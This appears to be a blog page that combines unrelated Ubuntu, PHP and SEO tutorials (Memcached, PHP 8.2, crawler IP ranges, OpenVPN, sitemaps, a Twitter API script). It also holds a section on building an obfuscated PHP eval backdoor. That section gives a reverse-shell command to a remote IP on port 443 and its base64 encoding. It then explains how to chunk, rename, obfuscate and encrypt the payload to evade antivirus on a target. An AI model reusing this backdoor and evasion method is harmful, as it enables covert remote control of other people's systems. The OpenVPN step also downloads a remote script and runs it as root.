Install Memcached for PHP 8.2-FPM With NGINX on Ubuntu

0. Don’t forget to install PEAR, which provides the pecl command.

sudo apt-get install -y php8.2-pear

1. After you install php8.2-fpm, run these commands:

sudo apt-get -y install gcc make autoconf libc-dev pkg-config
sudo apt-get -y install zlib1g-dev
sudo apt-get -y install libmemcached-dev
sudo pecl install memcached

RESULT:

WARNING: channel "pecl.php.net" has updated its protocols, use "pecl channel-update pecl.php.net" to update
pecl/memcached can optionally use PHP extension "igbinary" (version >= 2.0)
pecl/memcached can optionally use PHP extension "msgpack" (version >= 2.0)
downloading memcached-3.2.0.tgz …
Starting to download memcached-3.2.0.tgz (90,722 bytes)
…………………done: 90,722 bytes
18 source files, building
running: phpize

At the following prompts, press Enter to accept the default for everything except “enable sasl”. At the “enable sasl” prompt, type “no”, then press Enter.

Configuring for:
PHP Api Version: 20220829
Zend Module Api No: 20220829
Zend Extension Api No: 420220829
libmemcached directory [no] : no
zlib directory [no] : no
use system fastlz [no] : no
enable igbinary serializer [no] : no
enable msgpack serializer [no] : no
enable json serializer [no] : no
enable server protocol [no] : no
enable sasl [yes] : no
enable sessions [yes] :

Once installed, enable the extension in the PHP configuration and restart PHP-FPM by running the following commands:

sudo bash -c "echo 'extension=memcached.so' >> /etc/php/8.2/fpm/php.ini"
sudo bash -c "echo 'extension=memcached.so' >> /etc/php/8.2/cli/php.ini"
sudo service php8.2-fpm restart
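
To confirm the extension is active, you can run a quick check. Below is a minimal sketch assuming a memcached daemon is already running on the default 127.0.0.1:11211; the key and value are illustrative:

php -r 'var_dump(extension_loaded("memcached"));'

<?php
// check.php: verify the extension can reach a local memcached daemon
$m = new Memcached();
$m->addServer('127.0.0.1', 11211);
$m->set('hello', 'world', 60);   // store for 60 seconds
echo $m->get('hello'), PHP_EOL;  // prints "world" when everything works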


Installing and Configuring Memcached with PHP8.2

Memcached is a high-performance, distributed memory caching system designed to speed up dynamic web applications by alleviating database load. It is widely used to enhance the performance of web-based applications by caching data and objects in RAM to reduce the number of times an external data source (such as a database or API) must be read. This article will guide you through the process of installing Memcached on your server and integrating it with PHP.

Read also How to Install Memcached in CodeIgniter Framework

After installing PHP 8.2 with NGINX, install the Memcached server itself along with the Memcached extension for PHP:

sudo apt-get update
sudo apt-get install memcached
sudo apt-get install php8.2-memcached
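
Here is a minimal sketch of the cache-aside pattern once both packages are installed; the key name, TTL, and the stand-in data are illustrative:

<?php
$cache = new Memcached();
$cache->addServer('127.0.0.1', 11211);

$key = 'user:42:profile';
$profile = $cache->get($key);

if ($cache->getResultCode() === Memcached::RES_NOTFOUND) {
    // Stand-in for an expensive database query
    $profile = ['id' => 42, 'name' => 'Example'];
    $cache->set($key, $profile, 300); // cache for 5 minutes
}

print_r($profile);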

Conclusion: You have successfully installed and configured Memcached with PHP. Memcached is a powerful tool for improving the performance of your PHP applications. It’s easy to set up and integrate, and it can significantly reduce the load on your database by caching frequently accessed data.

Additional Tips:

  • Regularly monitor your Memcached usage (a quick check follows this list).
  • Secure your Memcached server, especially if it’s on a public network.
  • Keep your software updated for security and performance improvements.
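
One simple way to monitor usage, assuming the daemon listens on the default 127.0.0.1:11211 and Ubuntu's default OpenBSD netcat is installed:

echo "stats" | nc -q 1 127.0.0.1 11211

This prints hit/miss counters, memory usage, and eviction counts straight from the daemon.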

Top Crawlers Bots IP Ranges For Search Engine Optimization

In the world of Search Engine Optimization (SEO), understanding the behavior of search engine crawlers is crucial. These crawlers, also known as bots or spiders, are automated programs used by search engines like Google, Bing, and others to scan and index the content of websites. By identifying the IP ranges of these crawlers, webmasters can optimize their websites more effectively. This article delves into the top crawlers, their IP ranges, and how this knowledge benefits SEO.

  • Google IP Ranges: https://www.gstatic.com/ipranges/goog.json
  • Google Bots: https://developers.google.com/static/search/apis/ipranges/googlebot.json
  • Google Special Crawlers: https://developers.google.com/static/search/apis/ipranges/special-crawlers.json
  • Google User Triggered Fetchers: https://developers.google.com/static/search/apis/ipranges/user-triggered-fetchers.json
  • Google Cloud external IP ranges (global and regional, for customers’ resources): https://www.gstatic.com/ipranges/cloud.json
  • BingBot IP Ranges: https://www.bing.com/toolbox/bingbot.json
  • DuckDuckGo Bots: https://duckduckgo.com/duckduckgo-help-pages/results/duckduckbot/
  • Ahrefs Crawler IP Ranges: https://api.ahrefs.com/v3/public/crawler-ip-ranges
  • Yandex IP Ranges: https://yandex.com/ips
  • Facebook IP Ranges: https://developers.facebook.com/docs/sharing/webmasters/crawler/

References:
  • All Crawlers User Agents: https://gist.github.com/josuamarcelc/6bfbdc14c6292e195844032bea7211d1
  • Google Crawler Indexing: https://developers.google.com/search/docs/crawling-indexing/verifying-googlebot
  • Yandex Robots: https://yandex.com/support/webmaster/robot-workings/check-yandex-robots.html
  • Moz RogerBot: https://moz.com/help/moz-procedures/crawlers/rogerbot
  • Verify Bingbot: https://www.bing.com/webmasters/help/verify-bingbot-2195837f

Cloud IP Reference Links:
  • Cloudflare IP Ranges v4: https://www.cloudflare.com/ips-v4/#
  • Cloudflare IP Ranges v6: https://www.cloudflare.com/ips-v6/#
  • Cloudflare API IP Ranges: https://api.cloudflare.com/client/v4/ips
  • Yandex Cloud IPs: https://cloud.yandex.com/en/docs/vpc/concepts/ips

Understanding Search Engine Crawlers

What Are Crawlers?

Crawlers are automated programs that visit websites to read and index their content. They follow links from one page to another, thereby creating a map of the web that search engines use to provide relevant search results.

Importance in SEO

Recognizing crawlers is essential in SEO as it ensures that your website is indexed correctly. Proper indexing increases the chances of your website appearing in search results, thereby driving organic traffic.

Top Search Engine Crawlers and Their IP Ranges

Googlebot

  • Primary Role: Indexing websites for Google Search.
  • IP Range: Googlebot IPs typically fall within ranges owned by Google. However, because Google owns a vast number of IP addresses, it is more efficient to verify Googlebot using the reverse DNS lookup method (see the sketch after this list).
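
Googlebot's documented verification is a reverse DNS lookup followed by a forward lookup that must return the original IP. A minimal PHP sketch of that check; the sample IP is illustrative:

<?php
function isGooglebot(string $ip): bool
{
    $host = gethostbyaddr($ip);              // reverse lookup
    if ($host === false || $host === $ip) {
        return false;                        // no PTR record
    }
    // Genuine Googlebot hosts end in googlebot.com or google.com
    if (!preg_match('/\.(googlebot|google)\.com$/', $host)) {
        return false;
    }
    return gethostbyname($host) === $ip;     // forward lookup must match
}

var_dump(isGooglebot('66.249.66.1'));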

Bingbot

  • Primary Role: Crawling for Microsoft’s Bing search engine.
  • IP Range: Bingbot also uses a range of IP addresses. Similar to Googlebot, it’s advisable to use reverse DNS lookups to confirm the legitimacy of Bingbot.

Baiduspider

  • Primary Role: Indexing for the Baidu search engine, predominantly used in China.
  • IP Range: Baiduspider’s IP ranges are published by Baidu and can be found in their webmaster tools documentation.

Yandex Bot

  • Primary Role: Crawling for Russia’s Yandex search engine.
  • IP Range: Yandex provides a list of IP addresses for its crawlers, which can be found in their official documentation.

Why Knowing IP Ranges Matters

  1. Security: Distinguishing between legitimate crawlers and malicious bots is crucial for website security (a range-check sketch follows this list).
  2. Accurate Analytics: Identifying crawler traffic helps in obtaining more accurate analytics data, as it separates human traffic from bot traffic.
  3. SEO Optimization: Understanding crawler behavior helps in optimizing websites for better indexing and ranking.
  4. Resource Management: It helps in managing server resources effectively, as crawlers can consume significant bandwidth.
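
For list-based verification, here is a hedged PHP sketch that tests whether an IPv4 address falls inside one of the prefixes published at the Googlebot endpoint listed earlier. It assumes the file uses the prefixes/ipv4Prefix layout of Google's published ranges, and the sample IP is illustrative:

<?php
$ip = '66.249.66.1';
$json = file_get_contents(
    'https://developers.google.com/static/search/apis/ipranges/googlebot.json'
);
$ranges = json_decode($json, true);

// True when $ip falls inside the IPv4 CIDR block $cidr
function inCidr(string $ip, string $cidr): bool
{
    [$subnet, $bits] = explode('/', $cidr);
    $mask = -1 << (32 - (int)$bits);
    return (ip2long($ip) & $mask) === (ip2long($subnet) & $mask);
}

$match = false;
foreach ($ranges['prefixes'] as $prefix) {
    if (isset($prefix['ipv4Prefix']) && inCidr($ip, $prefix['ipv4Prefix'])) {
        $match = true;
        break;
    }
}
echo $ip, $match ? ' is' : ' is not', ' in the published Googlebot ranges', PHP_EOL;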

Best Practices for Managing Crawler Traffic

  • Robots.txt File: Use this to guide crawlers on which parts of your site to scan and which to ignore (a tiny sample follows this list).
  • Monitoring Server Logs: Regularly check server logs for crawler activities to ensure that your site is being indexed properly.
  • Updating Sitemaps: Keep your sitemaps updated to aid crawlers in efficient website navigation.
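
As referenced above, a tiny illustrative robots.txt; the paths and sitemap URL are placeholders:

User-agent: *
Disallow: /admin/
Allow: /

Sitemap: https://yourwebsite.com/sitemap.xml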

Conclusion

Recognizing and understanding the IP ranges of top search engine crawlers is a vital aspect of SEO. It helps in distinguishing between genuine search engine bots and potential security threats, enhances website performance, and contributes to more effective SEO strategies. As search engines evolve, staying informed about crawler activities and best practices is essential for maintaining and improving your website’s search engine visibility.

Quota Exceeded While Requesting Indexing in Google Search Console

Search Analytics

Search Analytics quota falls into two types: load limits and QPS limits. The “quota exceeded” error message is the same for all quota-exceeded events.

Load quota

Load represents the internal resources consumed by a query. Most users will not exceed load limits, but if you do, you will receive a “quota exceeded” error message. The Search Analytics resource enforces the following load limits:

  • Short-term load quota: Short-term quota is measured in 10 minute chunks. To fix:
    • If you exceed your quota, wait 15 minutes and try again. If you still exceed quota, you are exceeding long-term quota.
    • If you are exceeding short-term quota only, spread out your queries throughout the day.
  • Long-term load quota: Long-term quota is measured in 1 day chunks. If you exceed quota when running only a single query inside a 10 minute period, you are exceeding your long-term quota. To fix:
    • Queries are expensive when you group and/or filter by either page or query string. Queries grouped/filtered by page AND query string are the most expensive. To reduce your load for these queries, remove the grouping and/or filtering for the page and/or query string.
    • Query load increases with the date range queried. So queries with a six month range are much more expensive than a query with a one day range.
    • Avoid requerying the same data (for example, querying all data for last month over and over).

QPS quota

The Search Analytics resource enforces the following QPS (queries per second), QPM (queries per minute), and QPD (queries per day) limits:

  • Per-site quota (calls querying the same site):
    • 1,200 QPM
  • Per-user quota (calls made by the same user):
    • 1,200 QPM
  • Per-project quota (calls made using the same Developer Console key):
    • 30,000,000 QPD
    • 40,000 QPM

Example

  • User A can make up to 1,200 QPM combined across her 3 websites.
  • Users A and B can make up to 1,200 QPM combined against their one website.

URL inspection

  • Per-site quota (calls querying the same site):
    • 2,000 QPD
    • 600 QPM
  • Per-project quota (calls made using the same Developer Console key):
    • 10,000,000 QPD
    • 15,000 QPM

All other resources

  • Per-user limit (calls made by the same user):
    • 20 QPS
    • 200 QPM
  • Per-project limit (calls made using the same Developer Console key):
    • 100,000,000 QPD

Reference: https://developers.google.com/webmaster-tools/limits
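
When you do hit these limits, the usual remedy besides reducing query cost is to retry with exponential backoff. Below is a generic, hedged PHP sketch of that pattern; the callable's shape and which status codes you treat as quota errors depend on your client:

<?php
// $call is any function returning [httpStatus, body].
function withBackoff(callable $call, int $maxRetries = 5)
{
    for ($attempt = 0; $attempt <= $maxRetries; $attempt++) {
        [$status, $body] = $call();
        if ($status < 400) {
            return $body; // success
        }
        // For simplicity, retry on any error status; in practice,
        // check specifically for quota errors such as 403 or 429.
        if ($attempt < $maxRetries) {
            sleep((2 ** $attempt) + random_int(0, 1)); // backoff plus jitter
        }
    }
    throw new RuntimeException("still failing after {$maxRetries} retries");
}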

Set Up OpenVPN Server In 3 Minutes

sudo apt update
sudo apt upgrade

ip a
ip a show eth0

dig +short myip.opendns.com @resolver1.opendns.com
dig TXT +short o-o.myaddr.l.google.com @ns1.google.com | awk -F'"' '{ print $2}'
wget https://git.io/vpn -O openvpn-install.sh
chmod +x openvpn-install.sh

sudo ./openvpn-install.sh

Sample session from AWS/Lightsail, where the cloud server is behind NAT.

Sample session from a Linode/DO server, where the cloud server has a direct public IP.

To avoid problems, always choose 1.1.1.1 or Google DNS when prompted; these are fast DNS servers reachable from anywhere on the Internet.
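
The installer writes a client profile (a .ovpn file) for the client name you choose; copy it to your client machine and connect with the standard OpenVPN client. The filename below is whatever the script generated for you:

sudo openvpn --config client.ovpn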

Submitting Your Sitemap to Search Engines via HTTP (Google and Bing)

Submitting your sitemap to search engines via HTTP can be done using a straightforward method. Here are the general steps to submit your sitemap using an HTTP request:

  1. Create or Generate Your Sitemap:
    • If you haven’t already, create a valid XML sitemap for your website. This sitemap should list all the URLs you want search engines to index.
  2. Host the Sitemap on Your Web Server:
    • Upload your sitemap file to your web server or hosting account. You should be able to access it via a URL, such as https://yourwebsite.com/sitemap.xml.
  3. Use a Web Browser or Command-Line Tool:
    • You can use a web browser or a command-line tool like curl or wget to send an HTTP request to search engines. Below are examples of how to do this:
    Using a Web Browser:
    • Open your web browser and visit the respective URL to submit your sitemap to Google or Bing:
      • For Google: https://www.google.com/ping?sitemap=https://yourwebsite.com/sitemap.xml
      • For Bing: https://www.bing.com/ping?sitemap=https://yourwebsite.com/sitemap.xml
      Replace https://yourwebsite.com/sitemap.xml with the actual URL of your sitemap.
    Using Command-Line Tools (e.g., curl):
    • Open your command-line interface and run the following command to submit your sitemap to Google (the ping endpoint takes the sitemap URL as a query parameter):
      curl "https://www.google.com/ping?sitemap=https://yourwebsite.com/sitemap.xml"
    • Or run this to submit your sitemap to Bing:
      curl "https://www.bing.com/ping?sitemap=https://yourwebsite.com/sitemap.xml"
  4. Check the Response:
    • After submitting the HTTP request, you should receive a response from the search engine. This response will typically indicate whether the sitemap submission was successful.
  5. Monitor Search Console:
    • Although submitting via HTTP can notify search engines of your sitemap, it’s a good practice to monitor your Google Search Console and Bing Webmaster Tools accounts. These tools provide more insights into the indexing status of your website and any potential issues.

Submitting your sitemap via HTTP is a convenient and straightforward way to inform search engines about your website’s structure and content updates. However, keep in mind that while this method helps with initial discovery, it does not replace the need for regular monitoring and management of your website’s SEO through official search engine webmaster tools.
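
If you prefer to automate the pings, here is a small PHP sketch that hits both endpoints above; the sitemap URL is a placeholder, and it assumes allow_url_fopen is enabled:

<?php
$sitemap = 'https://yourwebsite.com/sitemap.xml';
$endpoints = [
    'https://www.google.com/ping?sitemap=',
    'https://www.bing.com/ping?sitemap=',
];
foreach ($endpoints as $endpoint) {
    // @ suppresses the warning on network failure; we check the result instead
    $response = @file_get_contents($endpoint . urlencode($sitemap));
    echo $endpoint, ($response === false) ? ' failed' : ' ok', PHP_EOL;
}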

PHP Shell Eval() Backdoor Obfuscation

Introduction

When working with any programming or scripting language, you might ask yourself whether that language could be used for “hacking”. At first the question seems superficial, but let’s take it seriously. I love PHP a lot, to be honest; I use it for everything: on the web, for cryptographic tasks, and even in backdoors. It is a very clear language, well suited to its purpose. I asked myself what new thing we could do with this great language: let’s obfuscate a backdoor to avoid detection by AV while making the code behave like ordinary code, and that is where the idea came from.

Walk through the standards

Before starting anything new, you should set out your standards and policies first, to see how you should build your new theory. For example, these are the standards I chose to follow and care about:

  • Payload delivery
  • Symantec and Signature based detections
  • Readability of the code
  • Command execution workflow
  • Firewalls

There are more, but these are the major standards I wanted to care about while crafting this backdoor.

Planning for the theory

Now that we know what we are going to do and which standards to follow, we come to the planning stage. I wanted to use something new to the security appliances, something not commonly used against them, so the chance of detection decreases. In my plan I decided to follow these rules:

Use multiple foreign languages, rarely seen in code, to write the backdoor.

Every variable written in a given language should have its own reference variable, itself written differently; this step confuses the code more and more.

The order of the variables should be varied, so debugging or deobfuscating the code becomes harder.

System commands and PHP code used in this mission should be encoded and split into chunks, with every chunk in its own variable. Each variable gets its own reference variable following the standards above, and the order of the encoded chunks is shuffled; when the decoder function runs, the chunks are concatenated back in the right sequence through the reference variables, and we can mix reference and standard variables, as we will see later in this article.

The decoder function should also be obfuscated: truncate it following the previous rules, then use it through a variable to decode the encoded string.

Variable names should also contain special characters such as ‘_’ and numbers. For example, in a language like Chinese, one English word may translate to two strings, so we can use multiple forms and define more than one variable with nearly the same name, like:

$最後の4

$最後の3

$最後の_3

$最_後の1

This would confuse the code more and more.

Optionally, and recommended in my view, encrypt the obfuscated code, then make the backdoor decrypt it and run it immediately; your code is then very well hidden, because on the surface it just decrypts a string and executes it, while deep down it is a backdoor. Note that the Windows installation of PHP is very funny: it disables the openssl extension by default yet leaves the eval function enabled 🙂 .. this means that if you want to use the encryption method, you should make sure your target has the openssl extension enabled; if your target is Linux, no worries.

1. Start crafting the command

Yes, we will obfuscate our code, but even the system command should be executed safely somehow. You could obfuscate the system command as well, but let’s keep it simple this time and craft a standard payload that still follows some security standards to avoid detection. First, the standards we’ll follow while crafting it:

Connect to our remote host on a standard port that is usually open and whitelisted in firewalls, e.g. 443.

Turn off any verbose output, because we want everything silent and, at the same time, clean on the compromised machine.

Run the command in the background, to make it even more silent.

Just to note, a system command may not lead directly to a reverse shell; for example, you could have PowerShell download a ps script and run it directly in memory to gain a reverse shell. But because we are concentrating on the obfuscation here, we will keep it as simple as we can and use netcat.

The command I used in this obfuscated payload is:

system(“start /b ncat.exe 192.168.245.213 443 -e cmd.exe”);

Of course the IP will vary, but everything other than the IP stays the same. Now, as explained before, we encode it, and the encoded text is:

c3lzdGVtKCJzdGFydCAvYiBuY2F0LmV4ZSAxOTIuMTY4LjI0NS4yMTMgNDQzIC1lIGNtZC5leGUiKTs=

Note: if you obfuscate a payload and find base padding such as “==” at the end, you can safely remove it as a way of confusing and hiding the identity of the encoding / base, and we did that here.

Let’s discuss how we should use it in our obfuscated code:

c3lzdGVtKCJ || zdGFydCA || vYiBuY2F0LmV4ZS || AxOTIuMTY4L || jI0NS4 || yMTMgNDQzIC1l || IGNtZC5leGUiKTs

We can split it at non-standard boundaries, as you can see above, which means every part of the base64 has a different length; so, when the parts are scattered into variables, it is hard to detect whether these strings are related to each other. For example:

The encoded PHP system command execution and the system command itself.

As you can see in the picture above, the lengths of the encoded chunks vary and they are not in the right sequence for decoding to work; when we decode, we will restore the right sequence (obfuscated, surely).

2. Handling the decoding function

As we know, we encoded the payload to be executed, including the PHP system command function, and now we should do the same with the decoding function. If you remember what we said in the Planning section, even the decoding function should be obfuscated, truncated, and unsorted as well. Let’s take a look at this part of the code:

Before continuing, note again that you can write your own base-encoding function and obfuscate it (that would be better), or use other techniques like ROT13 and build on them. Back to the code above: we truncated the function name into many parts to hide it. You may ask: but it’s in plain text, is that OK? The answer is yes and no:

Yes, because it will be placed in reference variables anyway, so it will be hard to find / detect.

No, because we could use techniques like string reversal or ROT13, then pass the decoded result as a function, and that would be better.

And now you will see that when we use it, we go through references that are themselves referenced :), so it looks like this:

Now base64 is easily used as a function through a variable that itself uses a reference variable mixed with standard variables, and the decoding function runs safely without any problems.

3. Payload handling while decoding

This is the easiest part of the technique: all you should do is avoid using the encoded payload parts directly, and instead use reference variables following the techniques / rules explained before; this makes the payload even more confusing. We can also concatenate the payload by grouping every couple of encoded parts, then using the groups (in the right sequence, so the payload decodes correctly). We can see that in the following code:

4. Obfuscated payload with reference variables

I have not marked all the payloads here, but you get the point by now; concentrate especially on this part:

Here we used the variable $最後の3 to store part of the base64_decode function, while at the same time $最後の4 is used as a reference to the variable $_變量1, which stores part of the payload to be executed. Using what looks like the same variable name, changed by only one character, for very different purposes is confusing by design, and the same goes for the other highlighted variables. It is the art of obfuscation.

5. Executing the magic

Finally, we execute the decoded base64 using the eval function, as shown:

Now, simply running it gives us the reverse shell we want, with persistence even if the user hits CTRL + C, because, if you remember, we ran it in the background:

6. Final touches

As mentioned, you can also use encryption to hide the entire obfuscated payload, as in the following code:

Here we first encode our obfuscated code so that it can be handled safely in the encryption phase and to avoid bugs; it is kept inside a base64_decode() function, so whenever another function handles it, it sees the ordinary code without the encoding. We then take this encrypted / ciphered backdoor and do the following:

Here we decrypt the ciphered obfuscated payload and pass it straight into the eval function, as you can see.

7. Conclusion

Obfuscation is an art; there are no limits to what you can do. Always think crazily and outside the box, be both the red and the blue teamer, then cook your payload and feed it to the system.

Source: CyberGuy

Install PHP 8.2.8 In Ubuntu NGINX Server

PHP 8.2 also includes bug fixes and performance improvements over previous versions like 8.1. We recommend you test your codebase with PHP 8.2 before upgrading in a production setup, just to ensure that everything works as expected.

In this article we cover the steps used to install PHP 8.2 on Ubuntu 22.04|20.04|18.04. The default PHP version available in the OS repositories is usually older than the latest official PHP release. The PPA (Personal Package Archive) repositories for PHP allow you to install newer PHP releases on your Ubuntu system that are not available in the official repositories of the Linux distribution.

sudo apt update

sudo apt install -y lsb-release gnupg2 ca-certificates apt-transport-https software-properties-common

sudo add-apt-repository ppa:ondrej/php

sudo apt install php8.2-cli php8.2-fpm php8.2-common php8.2-mysql php8.2-pgsql php8.2-zip php8.2-gd php8.2-mbstring php8.2-curl php8.2-xml php8.2-bcmath php8.2-memcached

php -v

PHP 8.2.8 (cli) (built: Jul 8 2023 07:10:21) (NTS)
Copyright (c) The PHP Group
Zend Engine v4.2.8, Copyright (c) Zend Technologies
with Zend OPcache v8.2.8, Copyright (c), by Zend Technologies
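
To serve PHP through NGINX, point a server block at the PHP-FPM socket. Below is a minimal sketch assuming the stock Ubuntu socket path /run/php/php8.2-fpm.sock and the snippets file shipped with Ubuntu's nginx package; adjust root and server_name for your site:

server {
    listen 80;
    server_name example.com;
    root /var/www/html;
    index index.php index.html;

    # Hand .php requests to PHP 8.2 FPM over its unix socket
    location ~ \.php$ {
        include snippets/fastcgi-php.conf;
        fastcgi_pass unix:/run/php/php8.2-fpm.sock;
    }
}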

How To Get Twitter Trends API OAuth with PHP Script

You currently have Essential access which includes access to Twitter API v2 endpoints only. If you need access to this endpoint, you’ll need to apply for Elevated access via the Developer Portal.

https://developer.twitter.com/en/docs/twitter-api/getting-started/about-twitter-api#item0

{
  "errors": [
    {
      "message": "You currently have Essential access which includes access to Twitter API v2 endpoints only. If you need access to this endpoint, you’ll need to apply for Elevated access via the Developer Portal. You can learn more here: https://developer.twitter.com/en/docs/twitter-api/getting-started/about-twitter-api#v2-access-leve",
      "code": 453
    }
  ]
}


Here’s a sample PHP script that uses the Twitter API OAuth authentication process to get the current trending topics:

<?php

// Replace with your own values
$consumer_key = 'YOUR_CONSUMER_KEY';
$consumer_secret = 'YOUR_CONSUMER_SECRET';

// Set up the URL for the OAuth request
$url = "https://api.twitter.com/oauth2/token";

// Set up the headers for the OAuth request
$headers = array(
    "Content-Type: application/x-www-form-urlencoded;charset=UTF-8",
    "Authorization: Basic " . base64_encode($consumer_key . ":" . $consumer_secret)
);

// Set up the data for the OAuth request
$data = "grant_type=client_credentials";

// Initialize a cURL session
$curl = curl_init();

// Set the cURL options
curl_setopt($curl, CURLOPT_URL, $url);
curl_setopt($curl, CURLOPT_POST, true);
curl_setopt($curl, CURLOPT_HTTPHEADER, $headers);
curl_setopt($curl, CURLOPT_POSTFIELDS, $data);
curl_setopt($curl, CURLOPT_RETURNTRANSFER, true);

// Send the OAuth request and get the response
$response = curl_exec($curl);

// Close the cURL session
curl_close($curl);

// Decode the JSON response
$json = json_decode($response);

// Get the access token from the response
$access_token = $json->access_token;

// Set up the URL for the Trends API request
$url = "https://api.twitter.com/1.1/trends/place.json?id=1";

// Set up the headers for the Trends API request
$headers = array(
    "Authorization: Bearer " . $access_token
);

// Initialize a new cURL session
$curl = curl_init();

// Set the cURL options
curl_setopt($curl, CURLOPT_URL, $url);
curl_setopt($curl, CURLOPT_HTTPHEADER, $headers);
curl_setopt($curl, CURLOPT_RETURNTRANSFER, true);

// Send the Trends API request and get the response
$response = curl_exec($curl);
var_dump($response);
// Close the cURL session
curl_close($curl);

// Decode the JSON response
$json = json_decode($response);

// Print out the top 10 trending topics in the United States
for ($i = 0; $i < 10; $i++) {
    echo ($i+1) . ". " . $json[0]->trends[$i]->name . "\n";
}

?>

Make sure to replace YOUR_CONSUMER_KEY and YOUR_CONSUMER_SECRET with your own Twitter API credentials.

This script first makes an OAuth 2.0 request to obtain an access token, then uses that access token to make a request to the Trends API and print out the top 10 trending topics in the United States. You can modify the id parameter in the Trends API URL to get trending topics for a different location.
